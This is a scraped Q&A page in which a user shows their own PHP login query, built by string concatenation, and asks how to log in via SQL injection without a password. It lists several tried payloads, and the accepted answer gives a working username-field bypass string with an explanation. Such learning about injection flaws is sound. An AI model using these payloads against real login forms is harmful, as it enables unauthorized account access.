douping5015 2014-11-05 16:44
浏览 17
已采纳

sql注入可能是下面的PHP代码吗?

$sql_checkpasswd = "SELECT user_id, username, user_password, user_active
FROM " . USERS_TABLE . "
WHERE username = '" . $username . "'" . " AND user_password = '" . md5($password). "'";

Above is how my php code is written. This is for a login page.

How can use sql injection technique to login without knowing password?

Thanks

I tried all possible combinations ' OR '1=1'

' OR '1=1' --

admin');#

and all usual one's.

Error for one of the query: http://prntscr.com/53bmv8

P.s.: I have spent a great deal of time doing research on the subject and tried many different methods, which is why I am posting this question in order to get some help. I'm new at sql injection.

  • 写回答

3条回答 默认 最新

  • drahywu329376 2014-11-06 04:06
    关注

    I finally figured this out, might help someone else having same question:

    Enter this in username field:

    admin' AND 1=1 or '1'='1

    Above username works fine, I dont have to enter password and can leave it blank since the query becomes

    $username= admin' AND 1=1 OR '1'='1 AND $password = anything

    Even if one condition is satisfied in above query, i get the access and the username part is True since 1=1AND admin is an existing username

    本回答被题主选为最佳回答 , 对您是否有帮助呢?
    评论
查看更多回答(2条)

报告相同问题?

悬赏问题

  • ¥15 求帮我调试一下freefem代码
  • ¥15 R语言Rstudio突然无法启动
  • ¥15 关于#matlab#的问题:提取2个图像的变量作为另外一个图像像元的移动量,计算新的位置创建新的图像并提取第二个图像的变量到新的图像
  • ¥15 改算法,照着压缩包里边,参考其他代码封装的格式 写到main函数里
  • ¥15 用windows做服务的同志有吗
  • ¥60 求一个简单的网页(标签-安全|关键词-上传)
  • ¥35 lstm时间序列共享单车预测,loss值优化,参数优化算法
  • ¥15 Python中的request,如何使用ssr节点,通过代理requests网页。本人在泰国,需要用大陆ip才能玩网页游戏,合法合规。
  • ¥100 为什么这个恒流源电路不能恒流?
  • ¥15 有偿求跨组件数据流路径图